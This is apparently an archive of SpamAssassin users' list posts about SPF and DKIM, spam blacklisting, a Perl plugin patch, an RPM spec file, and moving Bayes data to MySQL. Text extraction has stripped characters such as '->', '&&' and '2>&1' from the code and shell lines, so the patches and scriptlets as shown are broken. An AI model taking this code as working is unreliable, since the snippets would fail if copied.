I'd like to make sure incoming mail that appears to be "From:" one of
our internal users has indeed gone through one of the systems
specified in the SPF record, resulting in an SPF_PASS.


Can't be done.  SPF looks at the envelope sender (what end-users know
as the Return-Path:) and not at all at the From: header.


Yes, I realize SPF is only concerned with the envelope-sender. I was 
thinking it would be possible to somehow correlate the SPF_PASS with a 
rule that analyzes the From: header and use that to compare?


Thanks,
Alex




You can do what you're trying to do with DKIM, though, and reject mail
claiming to be from your domain (in the From: header) that has an invalid
or no DKIM signature.

If you can't install DKIM software on your Exchange server, you can use
your Linux box as a smarthost and have the Linux box sign outbound
mail from the Exchange server.

Of course, internal mail won't ever leave the Exchange server and will thus
lack a DKIM signature, but that shouldn't be a problem... just check DKIM
on the MX hosts and not Exchange.

Regards,

Dianne.



Re: Rules needed...

2015-06-27 Thread Dave Wreski

Hi,


blacklist_from *@*.allisonarctictrips.com

spf-pass take responselily


Yes, after it's received, there are a ton of things that could be done
to block it (including my local RBL). I was hoping for something
preventative.



Eh?  I'm afraid I don't get this at all - greylisting and RBL checks in
the MTA before SA even sees it, are the only thing
out there that is even in the realm of preventative measures and you
already know about greylisting.

Are you not aware that once a DATA channel is opened on an SMTP
transaction that you have effectively received it?


You're thinking too hard about it. Yes, of course I was talking about 
before this message, or the dozens like it, were received in the first 
place.



But, putting RBL checks into the MTA is the best way I know to piss off
your users since tag-and-forward is not an option on MTA rbl checking.
That's why we all do our RBL checks in spamassassin.


Look into postscreen and the postscreen_dnsbl_threshold to rank the 
DNSBLs to weight them to prevent any single one from rejecting mail.


Regards,
Dave


Re: Rules needed...

2015-06-26 Thread Dave Wreski



On 06/26/2015 12:45 PM, Benny Pedersen wrote:

Alex Regan skrev den 2015-06-26 18:33:


http://pastebin.com/FzUkEvRp


blacklist_from *@*.allisonarctictrips.com

spf-pass take responselily


Yes, after it's received, there are a ton of things that could be done 
to block it (including my local RBL). I was hoping for something 
preventative.


Thanks,
Alex



Re: PerMsgStatus Util warnings

2015-05-15 Thread Dave Wreski

Hi,


$self-{main}-{registryboundaries}-uri_to_domain($fubar);


This appears to fix DecodeShortURLs.pm

--- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400
+++ DecodeShortURLs.pm  2015-05-15 11:39:35.020499066 -0400
@@ -486,7 +486,8 @@
  [Mail::SpamAssassin::Util::uri_list_canonify (undef, $uri)];

foreach (@{$info-{cleaned}}) {
-my ($dom, $host) = Mail::SpamAssassin::Util::uri_to_domain($_);
+my ($dom, $host) =
$info-{main}-{registryboundaries}-uri_to_domain($_);

  if ($dom  !$info-{domains}-{$dom}) {
# 3.4 compatibility as per Marc Martinec



For reference here too. Here's a working patch. Do not modify code at
random.  :-)


Thank you for posting the complete patch this time :-)

Alex




--- DecodeShortURLs.pm.orig 2015-05-15 19:19:07.0 +0300
+++ DecodeShortURLs.pm  2015-05-15 19:20:19.0 +0300
@@ -446,7 +446,7 @@

# At this point we have a new URL in $response
$pms-got_hit('HAS_SHORT_URL');
-  _add_uri_detail_list($pms, $location);
+  $self-_add_uri_detail_list($pms, $location);

# Set chained here otherwise we might mark a disabled page or
# redirect back to the same host as chaining incorrectly.
@@ -458,7 +458,7 @@
  my($host) = ($short_url =~ /^(https?:\/\/\S+)\//);
  $location = $host/$location;
  dbg(Looks like a local redirection: $short_url = $location);
-_add_uri_detail_list($pms, $location);
+$self-_add_uri_detail_list($pms, $location);
  return $location;
}

@@ -490,7 +490,7 @@
  # Beware.  Code copied from PerMsgStatus get_uri_detail_list().
  # Stolen from GUDO.pm
  sub _add_uri_detail_list {
-  my ($pms, $uri) = @_;
+  my ($self, $pms, $uri) = @_;
my $info;

# Cache of text parsed URIs, as previously used by get_uri_detail_list().
@@ -502,7 +502,7 @@
  [Mail::SpamAssassin::Util::uri_list_canonify (undef, $uri)];

foreach (@{$info-{cleaned}}) {
-my ($dom, $host) = Mail::SpamAssassin::Util::uri_to_domain($_);
+my ($dom, $host) = $self-{main}-{registryboundaries}-uri_to_domain($_);

  if ($dom  !$info-{domains}-{$dom}) {
# 3.4 compatibility as per Marc Martinec



Re: Spamassassin not catching spam (Follow-up)

2015-03-25 Thread Dave Wreski

Hi,


RH i don't know the UK laws but in germany it's for sure not allowed
RH because it's legally classified identical to a postman says meh i
don't
RH walk to go upstairs today and throw the letter away

RH if you pretend to provide relieable mailservices it should be
logically
RH that discard instead reject so that none of both parties can take
notice
RH in case of false positives is not that smart

Better go tel MS as that's exactly what hotmail and live do


because others do wrong is not a good justification


I hoped I could ask for a little more of an explanation.

I'm willing to rely on RBLs and postscreen to make outright reject 
decisions, but I'm not sure I want spamassassin/amavisd doing that. 
Silently quarantining viruses and spam is how it's been done here for a 
while.


So this method eliminates the content_filter configuration in postfix, 
where the messages are queued.


I can see this new method being suitable for smaller networks, but 
without any queuing capability, how does it scale?


Also, if there is even a temporary interruption in amavis' ability to 
operate, mail will be rejected.


Do large scale operators implement this proxy filter approach, and if 
so, aren't there any problems with processing times?


It seems the real advantage to doing it this way is the ability to 
quickly reject mail not already rejected by zen/postscreen/etc. Is that 
really such a big benefit?


And not even all spam would be rejected - only those you felt were over 
a predetermined threshold, correct? Why not just quarantine it all, 
giving the user the ability to determine if they want to go looking for it?


Thanks,
Alex


Re: URLs with non-ASCII chars

2015-02-13 Thread Dave Wreski



On 02/13/2015 05:29 PM, Dave Pooser wrote:

On 2/13/15, 4:27 PM, Dave Wreski dwre...@guardiandigital.com wrote:


I thought I would send this on to you instead of broadcasting it.


You thought wrong :-)



Yeah, thanks

One too many emails after reading spam for the last twelve hours

dave


URLs with non-ASCII chars

2015-02-13 Thread Dave Wreski

Hi John,

I thought I would send this on to you instead of broadcasting it.

I just received an email with an odd URL. It contained what appears to 
be a non-ASCII character simulating a period, or at least one that is 
not part of the standard set.


http://pastebin.com/x6TGNpD7

a href=3Dhttp://harvarddetails=E3=80=82pw; target=3D_blankClick

Is this a new method of obfuscation or is there a potential rule here?

Thanks,
Dave


Re: spamassassin 3.4.0 spec file for rhel4 rhel5 rhel6 and compatible os's

2014-02-14 Thread Dave Wreski
/spamassassin.XX) || exit 1
cp /etc/sysconfig/spamassassin $TMPFILE
perl -p -i -e 's/([\s]-\w+)a/$1/ ; s/([\s]-)a(\w+)/$1$2/ ; s/([\s])-a\b/$1/' $TMPFILE
perl -p -i -e 's/ --auto-whitelist//' $TMPFILE
# replace /etc/sysconfig/spamassassin only if it actually changed
cmp /etc/sysconfig/spamassassin $TMPFILE || cp $TMPFILE /etc/sysconfig/spamassassin
rm $TMPFILE

if [ -f /etc/spamassassin.cf ]; then
%{__mv} /etc/spamassassin.cf /etc/mail/spamassassin/migrated.cf
fi
if [ -f /etc/mail/spamassassin.cf ]; then
%{__mv} /etc/mail/spamassassin.cf /etc/mail/spamassassin/migrated.cf
fi

%postun
%if %{use_systemd} == 0
if [ $1 -ge 1 ]; then
/sbin/service spamassassin condrestart  /dev/null 21
fi
exit 0
%endif

%if %{use_systemd}
%if 0%{?fedora}  17
%systemd_postun spamassassin.service
%else
/bin/systemctl daemon-reload /dev/null 21 || :
if [ $1 -ge 1 ] ; then
# Package upgrade, not uninstall
/bin/systemctl try-restart spamassassin.service /dev/null 21 || :
fi
%endif
%endif

%preun
%if %{use_systemd} == 0
if [ $1 = 0 ] ; then
/sbin/service spamassassin stop /dev/null 21
/sbin/chkconfig --del spamassassin
fi
exit 0
%endif

%if %{use_systemd}
%if 0%{?fedora}  17
%systemd_preun spamassassin.service
%else
if [ $1 -eq 0 ] ; then
# Package removal, not upgrade
/bin/systemctl --no-reload disable spamassassin.service  /dev/null 21 || :
/bin/systemctl stop spamassassin.service  /dev/null 21 || :
fi
%endif
%endif

%if %{use_systemd}
%triggerun -- spamassassin  3.3.2-2
%{_bindir}/systemd-sysv-convert --save spamassassin /dev/null 21 ||:

# Run these because the SysV package being removed won't do them
/sbin/chkconfig --del spamassassin /dev/null 21 || :
/bin/systemctl try-restart spamassassin.service /dev/null 21 || :
%endif

%changelog
* Wed Feb 12 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-20
- Update to production release
- Build for fedora-17

* Wed Jan 08 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-19
- Update SVN
- Build for fedora-17

* Tue May 14 2013 Dave Wreski dwre...@guardiandigital.com - 3.4.0-18
- Update SVN

* Sat Apr 27 2013 Dave Wreski dwre...@guardiandigital.com - 3.4.0-17
- Remove RabinKarpBody.pm

* Fri Apr 26 2013 Dave Wreski dwre...@guardiandigital.com - 3.4.0-16
- Rebuild for fedora 17

* Fri Feb 15 2013 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-15
- Rebuilt for https://fedoraproject.org/wiki/Fedora_19_Mass_Rebuild

* Thu Nov 15 2012 Kevin Fenzi ke...@scrye.com 3.3.2-14
- Fix incorrect pgrep path. Fixes bug #875844

* Sat Aug 25 2012 Kevin Fenzi ke...@scrye.com 3.3.2-13
- Add systemd macros for presets. Fixes bug #850320

* Fri Aug 03 2012 Kevin Fenzi ke...@scrye.com - 3.3.2-12
- Fix sa-update not detecting spamd running. Fixes bug #755644
- Add restart=always to systemd file to work around upstream bug. Bug #812359

* Sat Jul 21 2012 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-11
- Rebuilt for https://fedoraproject.org/wiki/Fedora_18_Mass_Rebuild

* Wed Jun 13 2012 Petr Pisar ppi...@redhat.com - 3.3.2-10
- Perl 5.16 rebuild

* Thu Jan 19 2012 Kevin Fenzi ke...@scrye.com - 3.3.2-9
- Fix unit file to write pid correctly. Fixes bug #783108

* Sat Jan 14 2012 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-8
- Rebuilt for https://fedoraproject.org/wiki/Fedora_17_Mass_Rebuild

* Mon Sep 12 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-7
- Use sysvinit on F15, not systemd

* Thu Sep 08 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-6
- Don't install sysvinit script if using systemd

* Wed Sep 07 2011 Jesse Keating jkeat...@redhat.com - 3.3.2-5
- Add details for RHEL 7

* Sat Aug 13 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-4
- Build with systemd unit file for f16 and f17

* Thu Jul 21 2011 Petr Sabata con...@redhat.com - 3.3.2-3
- Perl mass rebuild

* Tue Jul 19 2011 Petr Sabata con...@redhat.com - 3.3.2-2
- Perl mass rebuild

* Mon Jun 6 2011 Warren Togami war...@togami.com - 3.3.2-1
- 3.3.2

* Mon May 30 2011 Warren Togami war...@togami.com - 3.3.2-0.8.rc2
- 3.3.2-rc2

* Mon May 16 2011 Warren Togami war...@togami.com - 3.3.2-0.7.rc1
- 3.3.2-rc1

* Sun Feb 27 2011 Ville Skyttä ville.sky...@iki.fi - 3.3.2-0.6.svn1071394
- Own /etc/mail dir (#645035).

* Wed Feb 16 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-0.5.svn1071394
- Oops, I left off svn in the Release of 3.3.2-0.4.svn1071394

* Wed Feb 16 2011 Nick Bebout n...@fedoraproject.org - 3.3.2-0.4.svn1071394
- replace @@VERSION@@ with current saversion
- restart spampd after sa-update cronjob runs
- update to svn1071394

* Wed Feb 09 2011 Fedora Release Engineering rel-...@lists.fedoraproject.org - 3.3.2-0.3.svn1027144
- Rebuilt for https://fedoraproject.org/wiki/Fedora_15_Mass_Rebuild

* Fri Oct 29 2010 Kevin Fenzi ke...@tummy.com - 3.3.2-0.2.svn1027144
- Fix sa-update sysconfig script line wrapping

* Mon Oct 25 2010 Nick Bebout n...@fedoraproject.org - 3.3.2-0.1.svn1027144
- Update to 3.3.2 - svn1027144 to solve

Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

2011-08-09 Thread Dave Wreski

Hi,


 I noticed that the site that provided the malware.blocklist.cf  has
been unavailable since at least the 8th of August.

URL for the file was on http://www.malware.com.br/cgi/submit?action=list_sa

The FQDN no longer resolves to an address.  I have tried our local DNS,
Level3 4.2.2.2 and Google 8.8.4.4. Its not there :(

Does anyone know why they are unavailable?  (Or even, is the site
available to you?)

Regards, S

Finally found that they changed their name a few months ago, and finally
they turned off the .com.br site.

http://www.malwarepatrol.net/

wget http://www.malwarepatrol.net//cgi/submit?action=list_sa;


Aren't these the same rules that are already present in the sanesecurity 
clamav db?


Thanks,
Dave



Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

2011-08-09 Thread Dave Wreski

Hi,


Finally found that they changed their name a few months ago, and
finally
they turned off the .com.br site.

http://www.malwarepatrol.net/

wget http://www.malwarepatrol.net//cgi/submit?action=list_sa;


Aren't these the same rules that are already present in the sanesecurity
clamav db?


Sanesecurity does not distribute the MalwarePatrol blocklist, this
signature file needs to be downloaded directly from their site.


Yes, maybe I wasn't clear. I meant that I thought the clamav version 
that is downloaded from their site (ala clamav-unofficial-sigs.sh) 
contains the same rules as this version that is downloaded for SA, correct?


Thanks again,
Dave


Re: Lots of Chinese Spam with attachments

2011-08-05 Thread Dave Wreski



Hear is the typical hits I get on a message:

X-Spam-Status: No, score=3.4 required=5.0 tests=BODY_8BITS,HTML_MESSAGE,
MIME_HTML_ONLY,RCVD_IN_BRBL_LASTEXT,RP_MATCHES_RCVD,SPF_PASS 
autolearn=no
version=3.3.1

...

X-Spam-Status: No, score=4.6 required=5.0 tests=BODY_8BITS,HTML_MESSAGE,
MIME_HTML_ONLY,RP_MATCHES_RCVD,SPF_PASS,UNWANTED_LANGUAGE_BODY 
autolearn=no
version=3.3.1


Bayes is missing from both of these. Are you not using bayes?

Post a sample to pastebin.com then follow up here with a link so we can 
investigate.


Regards,
Dave



Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski

Hi,


since so many have problems i share my mysql shemas :=)
`token` binary(5) NOT NULL,


Yes, the binary or varbinary is the key to a solution here.
Mucking with utf-8 vs latin-1 is just covering but not solving
the most glaring problem here, namely that a token must not be
associated with any character set, as it does not obey any
such rules, nor should it be treated case-insensitively
(as char is, which is possibly a reason for more than two
record changes as reported by Dave). Will take a closer look...


I changed the Type=MyISAM at the end of each CREATE statement in the 
original schema and replaced it with the following from Benny's schema:


ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;

It's now working, but is excruciatingly slow. Is this also just covering 
the problem, or will this be a usable solution when it finally finishes?


Is there a difference whether I learn as MyISAM then convert to InnoDB 
after it finishes? I could train it using original spam/ham, but I fear 
it will be equally as slow and obviously a more difficult process to 
hand-scan for corpus again.


Thanks,
Dave



Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski

Hi,


ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;

It's now working, but is excruciatingly slow. Is this also just covering
the problem, or will this be a usable solution when it finally finishes?


Just being curious: are you using

bayes_store_module Mail::SpamAssassin::BayesStore::MySQL
or
bayes_store_module Mail::SpamAssassin::BayesStore::SQL

the latter is VERY slow with MySQL


Yes, I'm using MySQL. It looks like I have some performance tuning to 
do. Michael's suggestions about sample my.cnf was a good one. Now have 
to wait until it finishes before doing any of that, though.


Thanks again,
Dave




Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski

Hi,


dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.


I have opened three bug entries, the first one is directly in response
to this problem report and brings a fix:

[Bug 6624] BayesStore/MySQL.pm fails to update tokens due to
MySQL server bug (wrong count of rows affected)
   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6624

[Bug 6625] Bayes SQL schema treats bayes_token.token as char
instead of binary, fails chset checks
   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6625

[Bug 6626] Newer MySQL chokes on TYPE=MyISAM syntax
   https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6626


Shouldn't one of these patches include the change to InnoDB in the 
schema itself instead of just a recommendation in the documentation?


Combined with the other patch, maybe Benny's should be the new preferred 
schema?



Dave, could you please revert my previous patch and apply instead
the patch attached to Bug  6624 (applicable to 3.3, or just install trunk).



Also consider the tiny fix to the schema as suggested by Benny Pedersen
and found as an attachment to Bug 6625. This should avoid a
problem if your SQL server defaults to UTF-8 or other character set
with stricter checking than a plain Latin-1.


Okay, both patches applied, and confirmed that it fixes the problem.

Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski

Hi,


dbg: bayes: error inserting token for line: t 1 0 1308114254
   4fd2b3f2f0 dbg: bayes: _put_token: Updated an unexpected number
   of rows. [repeats ...]


Which version of MySQL?

Did you remember to replace TYPE=MyISAM with TYPE=InnoDB in the
schema (according to README.bayes) if you are using the recommended
Mail::SpamAssassin::BayesStore::MySQL as the bayes_store_module?

Please try the following patch (against 3.3.2), at least it should provide
more informative diagnostics:


[snip..]

I faced the same problem today. In my case, MySQL was configured to
use utf8 by default:

   # my.cnf

   [client]
   default-character-set=utf8

   [mysqld]
   character-set-server=utf8
   collation-server=utf8_unicode_ci
   init_connect='set collation_connection = utf8_unicode_ci;'

After commenting out the utf8 definitions and reverting back to latin1
sa-learn --restore worked fine.


I'm using mysql version:

# mysql --version
mysql  Ver 14.14 Distrib 5.1.56, for redhat-linux-gnu (x86_64) using 
readline 5.1


Is there a difference between InnoDB and MyISAM in terms of training, or 
can that change be made the initial training? Why is it so much slower 
using InnoDB during training?


It looks like that may be my problem too. This is the result with your 
patch:


dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using userid: 3
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3, 
token: 7�OR�

dbg: bayes: error inserting token for line: t 0 1 1308332646 37fc4f52eb
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3, 
token: Y

dbg: bayes: error inserting token for line: t 0 2 1308070890 d2eec4f659

I'll try the suggested my.cnf changes and restart the process.

Thanks,
Dave






















Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski

Hi,


It looks like that may be my problem too. This is the result with your
patch:

dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using userid: 3
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3,
token: 7�OR�
dbg: bayes: error inserting token for line: t 0 1 1308332646 37fc4f52eb
dbg: bayes: _put_token: Updated an unexpected number of rows: 3, id: 3,
token: Y
dbg: bayes: error inserting token for line: t 0 2 1308070890 d2eec4f659

I'll try the suggested my.cnf changes and restart the process.


I thought it would take longer before it started to fail again, but 
trying to change the character set didn't make a difference for me.


Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski

Hi,


since so many have problems i share my mysql shemas :=)

please note that i expire som data not default done in current spamassassin


Your schema did not work for me. I deleted the existing database and 
recreated it, then created the tables using your schema. When starting 
to restore, a number of errors including these are produced:


Use of uninitialized value in concatenation (.) or string at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 139.

bayes: found bayes db version
Use of uninitialized value $db_ver in numeric ne (!=) at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 141.
Use of uninitialized value $db_ver in concatenation (.) or string at 
/usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 142.
bayes: database version  is different than we understand (3), aborting! 
at /usr/share/perl5/Mail/SpamAssassin/BayesStore/SQL.pm line 142.


It appears I'm using the same version as your schema indicated, so I'm 
not sure what the problem could be.


mysql  Ver 14.14 Distrib 5.1.56, for redhat-linux-gnu (x86_64) using 
readline 5.1


Thanks,
Dave


Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski

Hi,

I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to 
convert bayes to use mysql. The restore process fails after a few 
minutes due to too many errors:


dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]
bayes: encountered too many errors (20) while parsing token line, 
reverting to empty database and exiting
dbg: plugin: Mail::SpamAssassin::Plugin::Bayes=HASH(0x26b8af8) 
implements 'learner_close', priority 0
ERROR: Bayes restore returned an error, please re-run with -D for more 
information


This was already run with -D, so no further information is available.

I used the sql files from 
spamassassin.apache.org/full/3.0.x/dist/sql/bayes_mysql.sql to create 
the tables. Maybe the format has changed since then and there is a more 
updated file?


I'm using the sa from 
http://kojipkgs.fedoraproject.org/packages/spamassassin/3.3.2/1.fc14/x86_64/


Is there a way to skip these invalid records? Other ideas for resolving 
this?


I can successfully restore back to the normal dbm database.

Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski

Hi,


This one is the current SQL schema and works

http://svn.apache.org/repos/asf/spamassassin/tags/spamassassin_current_release_3.3.x/sql/bayes_mysql.sql


- Lawrence

On 20/06/2011 7:34 PM, Dave Wreski wrote:

Hi,

I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
to convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]


There are still the same errors with the new schema. Could it be a 
problem with the backup itself? I just used sa-learn --backup  
backup.txt to create the backup.


Thanks,
Dave


Re: Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski

Hi,


I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying
to convert bayes to use mysql. The restore process fails after a few
minutes due to too many errors:

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]

Did you make the backup using 3.3.2 as well?


Yes, and the bdb was originally created just recently using a v3.3.2 
pre-release as well. I also made sure the bdb was synced before trying 
to do the backup.


Thanks,
Dave


Re: Nearly 200.000 Spams today from coolserver.info and starsweet.info

2011-06-16 Thread Dave Wreski

Hi,


since some days my servers are hit by  50.000-80.000 Spams  a  day  and  for
some minutes they have spamed today 18 accounts out of 98.000 with MORE then
100.000 spams.

All spams coming from the same network:

  xxx.root.static.coolserver.info
  xxx.root.static.starsweet.info

where xxx change every time and the servers IP too  (they resolv)

In the body of the messages I found those domains:

advocatebuying.info aidpurchase.infoencouragebuying.info
ensurepurchase.info guidebuying.infomotivatebuying.info
providebuying.info  purchaseadvocate.info   purchaseaid.info
purchaseassist.info purchasecoach.info  purchaseguide.info
purchasesimplify.info   purchasesupport.infosimplifybuying.info
supportbuying.info  techsweet.info  topsweet.info


It hits bayes99 and is well over the threshold for me (example.com is my 
edit):


Jun 16 02:55:38 mail01 postfix/smtpd[13098]: 947E913D4015: 
client=46.wc.static.coolserver.info[173.245.204.46]
Jun 16 02:55:39 mail01 amavis[11055]: (11055-315) SPAM, 
lonnyear...@supportbuying.info - 26...@example.com, Y
es, hits=18.9 tag1=-300.0 tag2=5.0 kill=5.0 use_bayes=1 tests=BAYES_99, 
BOTNET, KHOP_DNSBL_BUMP, RAZOR2_CF_RANGE_51_100, RAZOR2
_CF_RANGE_E8_51_100, RAZOR2_CHECK, RCVD_IN_BRBL_LASTEXT, 
RCVD_IN_HOSTKARMA_BL, RCVD_IN_UCEPROTECT2, RCVD_IN_UCEPROTECT3, RELAYC
OUNTRY_LOW, SEM_URI, SEM_URIRED, SPF_HELO_PASS, SPF_PASS, 
TO_NO_BRKTS_DIRECT, TO_NO_BRKTS_NOTLIST, URIBL_BLACK, quarantine spam
-da25d90871b51f12e9de15bd5c5192cc-20110616-025538-11055-315 
(spam-quarantine)


I have a few thousand as well, and none have appeared to not be tagged 
properly. I've also now blocked the /23 at the SMTP level.


Regards,
Dave


Re: MySQL bayes setup question

2011-06-14 Thread Dave Wreski

Marc,


You can also find the readme for sql support there, or check out:
http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/README.bayes

It's quite easy to setup and get running.


I can't seem to find the bayes_mysql.sql file anywhere.


Depending on your distribution it could be in a number of places. You
could try a:
find / -name bayes_mysql.sql

If you have svn installed you can download it via svn. You can also
download it with wget (or view in browser) directry via:
http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/bayes_mysql.sql

From there it's as easy an configuring your local.cf to use Bayes SQL
and creating the tables in mysql. Don't forget to backup your existing
bayes tokens and such before doing any changes. You can later restore
that backup to Mysql so you don't lose any training.


Thanks - that's what I was looking for.


You might also find this helpful:

http://www200.pair.com/mecham/spam/debian-spamassassin-sql.html

Regards,
Dave